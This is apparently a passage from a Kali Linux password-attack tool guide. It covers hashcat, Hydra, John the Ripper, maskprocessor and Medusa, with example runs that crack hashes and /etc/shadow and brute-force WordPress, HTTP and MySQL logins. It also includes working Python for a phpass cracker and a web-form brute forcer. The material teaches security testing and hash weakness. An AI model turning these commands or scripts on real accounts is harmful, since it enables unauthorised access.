--backend-ignore-opencl | | Do not try to open OpenCL interface on startup |
-I, --backend-info | | Show system/evironment/backend API info | -I or -II
-d, --backend-devices | Str | Backend devices to use, separated with commas | -d 1
-D, --opencl-device-types | Str | OpenCL device-types to use, separated with commas | -D 1
-O, --optimized-kernel-enable | | Enable optimized kernels (limits password length) |
-M, --multiply-accel-disable | | Disable multiply kernel-accel with processor count |
-w, --workload-profile | Num | Enable a specific workload profile, see pool below | -w 3
-n, --kernel-accel | Num | Manual workload tuning, set outerloop step size to X | -n 64
-u, --kernel-loops | Num | Manual workload tuning, set innerloop step size to X | -u 256
-T, --kernel-threads | Num | Manual workload tuning, set thread count to X | -T 64
--backend-vector-width | Num | Manually override backend vector-width to X | --backend-vector=4
--spin-damp | Num | Use CPU for device synchronization, in percent | --spin-damp=10
--hwmon-disable | | Disable temperature and fanspeed reads and triggers |
--hwmon-temp-abort | Num | Abort if temperature reaches X degrees Celsius | --hwmon-temp-abort=100
--scrypt-tmto | Num | Manually override TMTO value for scrypt to X | --scrypt-tmto=3
-s, --skip | Num | Skip X words from the start | -s 1000000
-l, --limit | Num | Limit X words from the start + skipped words | -l 1000000
--keyspace | | Show keyspace base:mod values and quit |
-j, --rule-left | Rule | Single rule applied to each word from left wordlist | -j 'c'
-k, --rule-right | Rule | Single rule applied to each word from right wordlist | -k '^-'
-r, --rules-file | File | Multiple rules applied to each word from wordlists | -r rules/best64.rule
-g, --generate-rules | Num | Generate X random rules | -g 10000
--generate-rules-func-min | Num | Force min X functions per rule |
--generate-rules-func-max | Num | Force max X functions per rule |
--generate-rules-func-sel | Str | Pool of rule operators valid for random rule engine | --generate-rules-func-sel=ioTlc
--generate-rules-seed | Num | Force RNG seed set to X |
-1, --custom-charset1 | CS | User-defined charset ?1 | -1 ?l?d?u
-2, --custom-charset2 | CS | User-defined charset ?2 | -2 ?l?d?s
-3, --custom-charset3 | CS | User-defined charset ?3 |
-4, --custom-charset4 | CS | User-defined charset ?4 |
--identify | | Shows all supported algorithms for input hashes | --identify my.hash
-i, --increment | | Enable mask increment mode |
--increment-min | Num | Start mask incrementing at X | --increment-min=4
--increment-max | Num | Stop mask incrementing at X | --increment-max=8
-S, --slow-candidates | | Enable slower (but advanced) candidate generators |
--brain-server | | Enable brain server |
--brain-server-timer | Num | Update the brain server dump each X seconds (min:60) | --brain-server-timer=300
-z, --brain-client | | Enable brain client, activates -S |
--brain-client-features | Num | Define brain client features, see below | --brain-client-features=3
--brain-host | Str | Brain server host (IP or domain) | --brain-host=127.0.0.1
--brain-port | Port | Brain server port | --brain-port=13743
--brain-password | Str | Brain server authentication password | --brain-password=bZfhCvGUSjRq
--brain-session | Hex | Overrides automatically calculated brain session | --brain-session=0x2ae611db
--brain-session-whitelist | Hex | Allow given sessions only, separated with commas | --brain-session-whitelist=0x2ae611db
■ Example
# Single quotes are required: inside double quotes the shell would expand $P and $Bjlf... to empty strings and write a blank line
root@kali:~# echo '$P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0' > hash.txt
# Brute-force the phpass hash with lowercase letters only, trying lengths 4 through 5
root@kali:~# hashcat -a 3 -m 400 --increment --increment-min 4 --increment-max 5 hash.txt ?l?l?l?l?l
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 2889/5842 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
[...]
$P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0:pass
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 400 (phpass)
Hash.Target......: $P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0
Time.Started.....: Sat Oct 12 09:04:54 2024 (4 secs)
Time.Estimated...: Sat Oct 12 09:04:58 2024 (0 secs)
[...]
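What hashcat's mode 400 actually computes is easy to miss behind the status screen. The following is an added example written for this page, not hashcat's code: a phpass verifier that parses the cost character and salt out of the hash from the run above, recomputes the iterated MD5, and runs a small dictionary attack against it. The wordlist is constructed for the demo (the real run used a ?l mask); the algorithm itself is the published phpass portable-hash scheme.

```python
import hashlib
from typing import Iterable, Optional

# phpass "portable hash" ($P$ / $H$) verifier and a small dictionary attack.
# Added example for this page, not hashcat's code.
# Layout: $P$ + 1 cost char + 8-char salt + 22-char encoded MD5 digest (34 chars).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# The hash from the hashcat run above; cost char 'B' = index 13 = 2**13 rounds.
PAGE_HASH = "$P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0"

# Constructed wordlist for the demo (the real run used a ?l mask instead).
WORDLIST = ["admin", "letmein", "wordpress", "pass", "password"]


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64: 6 bits at a time, little-endian, ITOA64 alphabet."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_cost(stored: str) -> int:
    """Number of MD5 rounds encoded in the 4th character of the hash."""
    return 1 << ITOA64.index(stored[3])


def phpass_hash(password: str, salt: str, cost_log2: int, tag: str = "$P$") -> str:
    """md5(salt + pw), then 2**cost_log2 rounds of md5(previous + pw)."""
    if len(salt) != 8 or not 7 <= cost_log2 <= 30:
        raise ValueError("phpass needs an 8-char salt and a cost between 7 and 30")
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << cost_log2):
        digest = hashlib.md5(digest + pw).digest()
    return tag + ITOA64[cost_log2] + salt + _encode64(digest, 16)


def phpass_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and cost and compare the whole string."""
    if stored[:3] not in ("$P$", "$H$") or len(stored) != 34:
        return False
    cost_log2 = ITOA64.find(stored[3])
    if not 7 <= cost_log2 <= 30:
        return False
    return phpass_hash(password, stored[4:12], cost_log2, stored[:3]) == stored


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """First candidate that verifies, or None: hashcat -a 0 in miniature."""
    for word in candidates:
        if phpass_verify(word, stored):
            return word
    return None


if __name__ == "__main__":
    print(phpass_cost(PAGE_HASH), "rounds")   # 8192
    print(crack(PAGE_HASH, WORDLIST))          # pass
```

Cost 'B' means 8192 MD5 calls per guess, which is why a CPU-only hashcat still finished the ?l?l?l?l mask in four seconds above: MD5 is cheap and phpass only adds a constant factor. Treat any $P$ hash as weak against offline attack and prefer bcrypt or Argon2 on the application side.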
Hydra
Brute-forces password authentication for a wide range of protocols.
■ Usage
root@kali:~# hydra -h
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-r use a non-random shuffling method for option -x
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-K do not redo failed attempts (good for -M mass scanning)
-q do not print messages about connection errors
-U service module usage details
-m OPT options specific for a module, see -U output for information
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
■ Example
# Run a password-list attack against the WordPress login form
root@kali:~# hydra -L usernames.txt -P passwords.txt -s 80 \
http-post-form://192.168.11.4/wp-login.php:"log=^USER^&pwd=^PASS^":2=:F=
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-16 03:53:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1870 login tries (l:17/p:110), ~117 tries per task
[DATA] attacking http-post-form://192.168.11.4:80/wp-login.php:log=^USER^&pwd=^PASS^:2=:F=
[80][http-post-form] host: 192.168.11.4 login: admin password: pass
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-16 03:54:31
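Hydra's http-post-form module is mostly string substitution plus a success/failure test on the reply, and the same idea underlies Medusa's web-form module and Ncrack's HTTP support. The block below is an added example for this page, not Hydra's code: it spins up a stand-in for wp-login.php on localhost (constructed so the logic runs offline; it answers 302 on success and an error page otherwise, which is how WordPress behaves), substitutes ^USER^/^PASS^ into the form body, applies an F= failure marker, and implements -e nsr and -f. The marker string, the stub server and the admin:pass credential are assumptions chosen to mirror the run above.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from typing import List, Sequence, Tuple

# Stand-in for the wp-login.php target so the attack logic runs offline
# (constructed for this example; admin:pass mirrors the hydra result above).
VALID = {"admin": "pass"}
FAIL_MARKER = "ERROR: Invalid username or password"
BODY_TEMPLATE = "log=^USER^&pwd=^PASS^"      # the form string given to hydra


class FakeLogin(BaseHTTPRequestHandler):
    """Behaves like WordPress: 302 to wp-admin/ on success, error page otherwise."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("log", [""])[0]
        pwd = form.get("pwd", [""])[0]
        if VALID.get(user) == pwd:
            self.send_response(302)
            self.send_header("Location", "/wp-admin/")
            self.end_headers()
            return
        body = f"<div id='login_error'>{FAIL_MARKER}</div>".encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo output quiet


def start_server() -> Tuple[ThreadingHTTPServer, str]:
    srv = ThreadingHTTPServer(("127.0.0.1", 0), FakeLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/wp-login.php"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Judge the first response, as hydra does; following the 302 would hide it."""

    def redirect_request(self, *args, **kwargs):
        return None


def expand_extra(user: str, mode: str) -> List[str]:
    """hydra -e nsr: n = empty password, s = login as password, r = reversed login."""
    extra = []
    if "n" in mode:
        extra.append("")
    if "s" in mode:
        extra.append(user)
    if "r" in mode:
        extra.append(user[::-1])
    return extra


def attempt(url: str, user: str, pwd: str, fail_marker: str = FAIL_MARKER) -> bool:
    """One login try with ^USER^/^PASS^ substitution; True when the F= marker is absent."""
    data = BODY_TEMPLATE.replace("^USER^", urllib.parse.quote(user)).replace(
        "^PASS^", urllib.parse.quote(pwd))
    req = urllib.request.Request(url, data=data.encode(), method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    opener = urllib.request.build_opener(NoRedirect)
    try:
        resp = opener.open(req, timeout=5)
    except urllib.error.HTTPError as err:
        resp = err  # 3xx and 4xx answers arrive here; the body is still readable
    page = resp.read().decode(errors="replace")
    return fail_marker not in page


def brute_force(url: str, users: Sequence[str], passwords: Sequence[str],
                extra: str = "", stop_on_first: bool = True) -> List[Tuple[str, str]]:
    """Loop users, then passwords, like hydra's default order; stop_on_first is -f."""
    found = []
    for user in users:
        for pwd in expand_extra(user, extra) + list(passwords):
            if attempt(url, user, pwd):
                found.append((user, pwd))
                if stop_on_first:
                    return found
    return found


if __name__ == "__main__":
    server, target = start_server()
    print(brute_force(target, ["root", "admin"], ["123456", "pass"], extra="nsr"))
    server.shutdown()
```

Two things this makes visible. First, the F= string must occur on every failure page and never on a success page, otherwise every guess looks valid; when the application answers a redirect on success, an S= condition on the 302 is the more robust choice. Second, each attempt is a full HTTP round trip, so rate limiting and account lockout on the target side are what actually bound this attack, not the size of the wordlist.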
John the Ripper
Cracks password hashes.
■ Usage
root@kali:~# john --help
Usage: john [OPTIONS] [PASSWORD-FILES]
--help Print usage summary
--single[=SECTION[,..]] "Single crack" mode, using default or named rules
--single=:rule[,..] Same, using "immediate" rule(s)
--single-seed=WORD[,WORD] Add static seed word(s) for all salts in single mode
--single-wordlist=FILE *Short* wordlist with static seed words/morphemes
--single-user-seed=FILE Wordlist with seeds per username (user:password[s]
format)
--single-pair-max=N Override max. number of word pairs generated (6)
--no-single-pair Disable single word pair generation
--[no-]single-retest-guess Override config for SingleRetestGuess
--wordlist[=FILE] --stdin Wordlist mode, read words from FILE or stdin
--pipe like --stdin, but bulk reads, and allows rules
--rules[=SECTION[,..]] Enable word mangling rules (for wordlist or PRINCE
modes), using default or named rules
--rules=:rule[;..]] Same, using "immediate" rule(s)
--rules-stack=SECTION[,..] Stacked rules, applied after regular rules or to
modes that otherwise don't support rules
--rules-stack=:rule[;..] Same, using "immediate" rule(s)
--rules-skip-nop Skip any NOP ":" rules (you already ran w/o rules)
--loopback[=FILE] Like --wordlist, but extract words from a .pot file
--mem-file-size=SIZE Size threshold for wordlist preload (default 2048 MB)
--dupe-suppression Suppress all dupes in wordlist (and force preload)
--incremental[=MODE] "Incremental" mode [using section MODE]
--incremental-charcount=N Override CharCount for incremental mode
--external=MODE External mode or word filter
--mask[=MASK] Mask mode using MASK (or default from john.conf)
--markov[=OPTIONS] "Markov" mode (see doc/MARKOV)
--mkv-stats=FILE "Markov" stats file
--prince[=FILE] PRINCE mode, read words from FILE
--prince-loopback[=FILE] Fetch words from a .pot file
--prince-elem-cnt-min=N Minimum number of elements per chain (1)
--prince-elem-cnt-max=[-]N Maximum number of elements per chain (negative N is
relative to word length) (8)
--prince-skip=N Initial skip
--prince-limit=N Limit number of candidates generated
--prince-wl-dist-len Calculate length distribution from wordlist
--prince-wl-max=N Load only N words from input wordlist
--prince-case-permute Permute case of first letter
--prince-mmap Memory-map infile (not available with case permute)
--prince-keyspace Just show total keyspace that would be produced
(disregarding skip and limit)
--subsets[=CHARSET] "Subsets" mode (see doc/SUBSETS)
--subsets-required=N The N first characters of "subsets" charset are
the "required set"
--subsets-min-diff=N Minimum unique characters in subset
--subsets-max-diff=[-]N Maximum unique characters in subset (negative N is
relative to word length)
--subsets-prefer-short Prefer shorter candidates over smaller subsets
--subsets-prefer-small Prefer smaller subsets over shorter candidates
--make-charset=FILE Make a charset, FILE will be overwritten
--stdout[=LENGTH] Just output candidate passwords [cut at LENGTH]
--session=NAME Give a new session the NAME
--status[=NAME] Print status of a session [called NAME]
--restore[=NAME] Restore an interrupted session [called NAME]
--[no-]crack-status Emit a status line whenever a password is cracked
--progress-every=N Emit a status line every N seconds
--show[=left] Show cracked passwords [if =left, then uncracked]
--show=formats Show information about hashes in a file (JSON)
--show=invalid Show lines that are not valid for selected format(s)
--test[=TIME] Run tests and benchmarks for TIME seconds each
(if TIME is explicitly 0, test w/o benchmark)
--stress-test[=TIME] Loop self tests forever
--test-full=LEVEL Run more thorough self-tests
--no-mask Used with --test for alternate benchmark w/o mask
--skip-self-tests Skip self tests
--users=[-]LOGIN|UID[,..] [Do not] load this (these) user(s) only
--groups=[-]GID[,..] Load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..] Load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX] Load salts with[out] COUNT [to MAX] hashes, or
--salts=#M[-N] Load M [to N] most populated salts
--costs=[-]C[:M][,...] Load salts with[out] cost value Cn [to Mn]. For
tunable cost parameters, see doc/OPTIONS
--fork=N Fork N processes
--node=MIN[-MAX]/TOTAL This node's number range out of TOTAL count
--save-memory=LEVEL Enable memory saving, at LEVEL 1..3
--log-stderr Log to screen instead of file
--verbosity=N Change verbosity (1-5 or 6 for debug, default 3)
--no-log Disables creation and writing to john.log file
--bare-always-valid=Y Treat bare hashes as valid (Y/N)
--catch-up=NAME Catch up with existing (paused) session NAME
--config=FILE Use FILE instead of john.conf or john.ini
--encoding=NAME Input encoding (eg. UTF-8, ISO-8859-1). See also
doc/ENCODINGS.
--input-encoding=NAME Input encoding (alias for --encoding)
--internal-codepage=NAME Codepage used in rules/masks (see doc/ENCODINGS)
--target-encoding=NAME Output encoding (used by format)
--force-tty Set up terminal for reading keystrokes even if we're
not the foreground process
--field-separator-char=C Use 'C' instead of the ':' in input and pot files
--[no-]keep-guessing Try finding plaintext collisions
--list=WHAT List capabilities, see --list=help or doc/OPTIONS
--length=N Shortcut for --min-len=N --max-len=N
--min-length=N Request a minimum candidate length in bytes
--max-length=N Request a maximum candidate length in bytes
--max-candidates=[-]N Gracefully exit after this many candidates tried.
(if negative, reset count on each crack)
--max-run-time=[-]N Gracefully exit after this many seconds (if negative,
reset timer on each crack)
--mkpc=N Request a lower max. keys per crypt
--no-loader-dupecheck Disable the dupe checking when loading hashes
--pot=NAME Pot file to use
--regen-lost-salts=N Brute force unknown salts (see doc/OPTIONS)
--reject-printable Reject printable binaries
--tune=HOW Tuning options (auto/report/N)
--subformat=FORMAT Pick a benchmark format for --format=crypt
--format=[NAME|CLASS][,..] Force hash of type NAME. The supported formats can
be seen with --list=formats and --list=subformats.
See also doc/OPTIONS for more advanced selection of
format(s), including using classes and wildcards.
■ Example
# The shadow file uses yescrypt, so --format=crypt (the system's crypt(3)) is specified
root@kali:~# john /etc/shadow --format=crypt
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
hello (hello)
1g 0:00:00:00 DONE 1/3 (2024-10-19 11:42) 3.125g/s 300.0p/s 300.0c/s 300.0C/s hello..hello999993
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
root@kali:~# john /etc/shadow --show
hello:hello:20015:0:99999:7:::
1 password hash cracked, 0 left
Cracking a password with Johnny, the GUI front end for John
maskprocessor
Generates word lists for brute-force attacks.
■ Usage
root@kali:~# mp64 --help
High-Performance word generator with a per-position configureable charset
Usage: mp64 [options]... mask
* Startup:
-V, --version Print version
-h, --help Print help
* Increment:
-i, --increment=NUM:NUM Enable increment mode. 1st NUM=start, 2nd NUM=stop
Example: -i 4:8 searches lengths 4-8 (inclusive)
* Misc:
--combinations Calculate number of combinations
--hex-charset Assume charset is given in hex
-q, --seq-max=NUM Maximum number of multiple sequential characters
-r, --occurrence-max=NUM Maximum number of occurrence of a character
* Resources:
-s, --start-at=WORD Start at specific position
-l, --stop-at=WORD Stop at specific position
* Files:
-o, --output-file=FILE Output-file
* Custom charsets:
-1, --custom-charset1=CS User-defineable charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef
-4, --custom-charset4=CS sets charset ?1 to 0123456789abcdef
* Built-in charsets:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
■ Example
# Generate a word list of 5-character strings built from lowercase, uppercase and digits
root@kali:~# mp64 -1 ?l?u?d ?1?1?1?1?1 -o words.txt
root@kali:~# head -n 10 words.txt
aaaaa
aaaab
aaaac
aaaad
aaaae
aaaaf
aaaag
aaaah
aaaai
aaaaj
root@kali:~# tail -n 10 words.txt
99990
99991
99992
99993
99994
99995
99996
99997
99998
99999
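The keyspace arithmetic behind crunch (the byte and line counts it prints, the n! of -p) and maskprocessor (--combinations, -i, custom charsets) is the same per-position product. Here is an added example for this page, not maskprocessor's or crunch's code, that implements a small mask expander in mp64/hashcat syntax and translates crunch -t patterns into it, so the numbers and the first/last words of both runs on this page can be reproduced. The `at` parameter of `crunch_to_mask` is this example's own device for crunch's -f charset override.

```python
import itertools
import math
from typing import Dict, Iterator, List, Optional, Tuple

# Per-position mask expander in the style of mp64 / hashcat -a 3 (added example
# for this page, not maskprocessor's or crunch's code).
BUILTIN = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "s": "!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def expand_charset(spec: str, custom: Dict[str, str]) -> str:
    """Resolve a charset spec such as '?l?u?d' or '?dabcdef' into its characters."""
    out: List[str] = []
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":
                out.append("?")
            elif key in custom:
                out.append(custom[key])
            elif key in BUILTIN:
                out.append(BUILTIN[key])
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            out.append(spec[i])
            i += 1
    # drop duplicates (keeping order) so the counts below are exact
    return "".join(dict.fromkeys("".join(out)))


def resolve_custom(raw: Dict[str, str]) -> Dict[str, str]:
    """Expand -1..-4 definitions in order, so ?2 may be built from ?1."""
    resolved: Dict[str, str] = {}
    for key in sorted(raw):
        resolved[key] = expand_charset(raw[key], resolved)
    return resolved


def parse_mask(mask: str, custom: Dict[str, str]) -> List[str]:
    """Split a mask into one charset per position; anything not '?x' is a literal."""
    positions: List[str] = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            positions.append(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            positions.append(mask[i])     # e.g. the '-' in 00-00000
            i += 1
    return positions


def crunch_to_mask(pattern: str, at: str = "?l") -> str:
    """Translate a crunch -t pattern (@ , % ^) into mask syntax. `at` is what @
    stands for; crunch -f <file> <name> swaps the default lowercase set for it."""
    table = {"@": at, ",": "?u", "%": "?d", "^": "?s", "?": "??"}
    return "".join(table.get(ch, ch) for ch in pattern)


def combinations(mask: str, custom: Dict[str, str]) -> int:
    """mp64 --combinations: the product of the per-position charset sizes."""
    return math.prod(len(cs) for cs in parse_mask(mask, custom))


def output_bytes(mask: str, custom: Dict[str, str]) -> int:
    """What crunch reports before writing: every line is its length plus a newline."""
    positions = parse_mask(mask, custom)
    return combinations(mask, custom) * (len(positions) + 1)


def generate(mask: str, custom: Dict[str, str],
             increment: Optional[Tuple[int, int]] = None) -> Iterator[str]:
    """Yield candidates; increment=(start, stop) mimics -i start:stop by using
    the first n mask positions for each length n."""
    positions = parse_mask(mask, custom)
    if increment is None:
        lengths = [len(positions)]
    else:
        lengths = range(increment[0], min(increment[1], len(positions)) + 1)
    for n in lengths:
        for combo in itertools.product(*positions[:n]):
            yield "".join(combo)


def permute(items: List[str]) -> Iterator[str]:
    """crunch -p: every ordering of the given pieces (n! results), no repeats."""
    for order in itertools.permutations(items):
        yield "".join(order)


if __name__ == "__main__":
    cs = resolve_custom({"1": "?l?u?d"})
    print(combinations("?1?1?1?1?1", cs))               # 916132832 (62**5)
    m = crunch_to_mask("@@-@@@@@", at="?d")
    print(m, combinations(m, {}), output_bytes(m, {}))  # ?d?d-?d?d?d?d?d 10000000 90000000
```

Run the arithmetic before running the generator: the mp64 example above is 62^5 = 916,132,832 lines (about 5.5 GB on disk), which is why for a mask attack it is better to pipe mp64 into hashcat or to hand hashcat the mask directly than to write words.txt at all.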
Medusa
Brute-forces login authentication for HTTP, SMB, SSH, FTP, relational databases and more.
■ Usage
root@kali:~# medusa
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [TEXT] : Resume scan based on map of previous scan
root@kali:~# medusa -d
Available modules in "/usr/lib/x86_64-linux-gnu/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.1
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.1
+ svn.mod : Brute force module for Subversion sessions : version 2.1
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0
■ Example
# Brute-force HTTP Basic authentication (the http module takes its auth type as AUTH:<type>)
root@kali:~# medusa -v 4 -h 192.168.11.4 -U usernames.txt -P passwords.txt -M http -m AUTH:BASIC
ACCOUNT FOUND: [http] Host: 192.168.11.4 User: hello Password: hello [SUCCESS]
# Brute-force MySQL password authentication
root@kali:~# medusa -v 4 -h 192.168.11.4 -U usernames.txt -P passwords.txt -M mysql
ACCOUNT FOUND: [mysql] Host: 192.168.11.4 User: hello Password: hello [SUCCESS]
Name That Hash
Identifies more than 300 kinds of hash and shows their names and related information.
■ Usage
root@kali:~# nth --help
Usage: nth [OPTIONS]
Options:
-t, --text TEXT Check one hash, use single quotes ' as inverted commas
" messes up on Linux.
-f, --file FILENAME Checks every hash in a newline separated file.
-g, --greppable Are you going to grep this output? Prints in JSON
format.
-b64, --base64 Decodes hashes in Base64 before identification. For
files with mixed Base64 & non-encoded it attempts
base64 first and then falls back to normal hash
identification per hash.
-a, --accessible Turn on accessible mode, does not print ASCII art. Also
does not print very large blocks of text, as this can
cause some pain with screenreaders. This reduces the
information you get. If you want the least likely
feature but no banner, use --no-banner.
-e, --extreme Searches for hashes within a string. This mode will get
5d41402abc4b2a76b9719d911017c592 from
####5d41402abc4b2a76b9719d911017c592###
--no-banner Removes banner from startup.
--no-john Don't print John The Ripper Information.
